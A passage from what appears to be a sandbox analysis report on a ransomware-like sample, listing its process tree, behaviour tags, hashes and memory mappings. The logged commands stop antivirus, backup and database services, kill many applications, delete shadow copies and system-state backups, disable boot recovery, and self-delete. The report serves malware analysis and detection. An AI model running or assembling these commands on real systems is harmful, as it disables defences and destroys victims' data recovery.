C:\Windows\SysWOW64\net.exenet stop sacsvr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SamSs /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SAVAdminService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop CABService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CABService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SDRSVC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SepMasterService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop ShMonitor /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Smcinst /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SmcService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SMTPSVC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSVC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SNAC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SNAC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SntpService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop sophossps /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ BKUPEXEC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ BKUPEXEC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ ECWDB2 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ PRACTTICEBGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ PRACTTICEBGC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ PRACTTICEMGT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ PRACTTICEMGT /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ TPS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ VEEAMSQL2012 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2012 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLSafeOLRService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLSERVERAGENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLTELEMETRY /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLTELEMETRY $ ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY $ ECWDB2 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SstpSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop svcGenericHost /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop swi_filter /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop swi_service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop swi_update_64 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop TmCCSF /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop tmlisten /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop TrueKey /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop TrueKeyScheduler /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop UI0Detect /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamBackupSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamBrokerSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamCatalogSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamCloudSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamDeploymentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamDeploySvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamEnterpriseManagerSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamMountSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamRESTSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop W3svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3svc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop wbengine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop WRSVC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamHvIntegrationSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop swi_update /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ CXDB /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ CXDB /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ CITRIX_METAFRAME /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ CITRIX_METAFRAME /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQL /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQL /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ PROD /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Zoolz 2 Service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Zoolz 2 Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ PROD /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop msftesql $ PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql $ PROD /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop NetMsmqActivator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop EhttpSrv /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop ekrn /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop ESHASRV /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SOPHOS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SOPHOS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent $ SOPHOS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent $ SOPHOS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop AVP /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop klnagent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SQLEXPRESS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SQLEXPRESS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLEXPRESS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLEXPRESS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop wbengine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop kavfsslp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop KAVFSGT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zoolz.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im agntsvc.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dbeng50.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dbsnmp.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im encsvc.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im firefoxconfig.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Infopath.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im isqlplussvc.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msaccess.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msftesql.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mspub.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mydesktopqos.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mydesktopservice.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mysqld.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mysqld-nt.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mysqld-opt.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ocautoupds.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ocomm.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ocssd.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powerpnt.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqbcoreservice.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlagent.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlbrowser.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlservr.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlwriter.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im steam.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im synctime.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tbirdconfig.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thebat.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thebat64.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im visio.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im xfssvccon.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tmlisten.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im PccNTMon.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CNTAoSMgr.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Ntrtscan.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mbamtray.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Cmd.exe >NUL 2> 12⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SYSTEM32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP2⤵
- Deletes System State backups
- Drops file in Windows directory
-
C:\Windows\SYSTEM32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest2⤵
- Deletes System State backups
- Drops file in Windows directory
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY DELETE /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Cmd.exeCmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe"2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\MRACReadMe.htmlMD5
6f6fd7dd505611fb2b251f1edfb2e855
SHA17fbe00b60eab4f8b7ebba3a38afbda0631a1ed80
SHA256a2d7319cb35819a3f2ef3450c9cb77cadb8fa378dcf9e88943929dec21b80f67
SHA512053d4456780fe9103bc1c10a2e3e31bf820b8a84e55677b2bca07aa1c6a7f81c4124beda3836d7e6ddf1dd40201e1603e542e62027e2602f093543fcca2397ff
-
memory/212-166-0x0000000000000000-mapping.dmp
-
memory/396-147-0x0000000000000000-mapping.dmp
-
memory/424-134-0x0000000000000000-mapping.dmp
-
memory/652-135-0x0000000000000000-mapping.dmp
-
memory/676-165-0x0000000000000000-mapping.dmp
-
memory/680-168-0x0000000000000000-mapping.dmp
-
memory/700-118-0x0000000000000000-mapping.dmp
-
memory/856-136-0x0000000000000000-mapping.dmp
-
memory/1044-137-0x0000000000000000-mapping.dmp
-
memory/1072-170-0x0000000000000000-mapping.dmp
-
memory/1084-174-0x0000000000000000-mapping.dmp
-
memory/1108-138-0x0000000000000000-mapping.dmp
-
memory/1168-167-0x0000000000000000-mapping.dmp
-
memory/1344-139-0x0000000000000000-mapping.dmp
-
memory/1420-140-0x0000000000000000-mapping.dmp
-
memory/1556-176-0x0000000000000000-mapping.dmp
-
memory/1668-177-0x0000000000000000-mapping.dmp
-
memory/1672-141-0x0000000000000000-mapping.dmp
-
memory/1716-143-0x0000000000000000-mapping.dmp
-
memory/1744-178-0x0000000000000000-mapping.dmp
-
memory/1760-142-0x0000000000000000-mapping.dmp
-
memory/1944-155-0x0000000000000000-mapping.dmp
-
memory/1984-132-0x0000000000000000-mapping.dmp
-
memory/2128-144-0x0000000000000000-mapping.dmp
-
memory/2176-179-0x0000000000000000-mapping.dmp
-
memory/2224-150-0x0000000000000000-mapping.dmp
-
memory/2232-119-0x0000000000000000-mapping.dmp
-
memory/2328-175-0x0000000000000000-mapping.dmp
-
memory/2408-173-0x0000000000000000-mapping.dmp
-
memory/2492-145-0x0000000000000000-mapping.dmp
-
memory/2520-169-0x0000000000000000-mapping.dmp
-
memory/2740-146-0x0000000000000000-mapping.dmp
-
memory/3028-117-0x0000000000000000-mapping.dmp
-
memory/3132-161-0x0000000000000000-mapping.dmp
-
memory/3208-133-0x0000000000000000-mapping.dmp
-
memory/3280-130-0x0000000000000000-mapping.dmp
-
memory/3284-148-0x0000000000000000-mapping.dmp
-
memory/3404-122-0x0000000000000000-mapping.dmp
-
memory/3688-172-0x0000000000000000-mapping.dmp
-
memory/3848-149-0x0000000000000000-mapping.dmp
-
memory/3920-131-0x0000000000000000-mapping.dmp
-
memory/4060-121-0x0000000000000000-mapping.dmp
-
memory/4076-120-0x0000000000000000-mapping.dmp
-
memory/4104-116-0x0000000000000000-mapping.dmp
-
memory/4260-125-0x0000000000000000-mapping.dmp
-
memory/4292-124-0x0000000000000000-mapping.dmp
-
memory/4332-123-0x0000000000000000-mapping.dmp
-
memory/4340-129-0x0000000000000000-mapping.dmp
-
memory/4412-126-0x0000000000000000-mapping.dmp
-
memory/4432-128-0x0000000000000000-mapping.dmp
-
memory/4456-127-0x0000000000000000-mapping.dmp
-
memory/4544-160-0x0000000000000000-mapping.dmp
-
memory/4584-159-0x0000000000000000-mapping.dmp
-
memory/4776-153-0x0000000000000000-mapping.dmp
-
memory/4816-151-0x0000000000000000-mapping.dmp
-
memory/4832-152-0x0000000000000000-mapping.dmp
-
memory/4888-157-0x0000000000000000-mapping.dmp
-
memory/4916-171-0x0000000000000000-mapping.dmp
-
memory/4948-154-0x0000000000000000-mapping.dmp
-
memory/4956-158-0x0000000000000000-mapping.dmp
-
memory/4996-156-0x0000000000000000-mapping.dmp
-
memory/5012-162-0x0000000000000000-mapping.dmp
-
memory/5052-163-0x0000000000000000-mapping.dmp
-
memory/5064-164-0x0000000000000000-mapping.dmp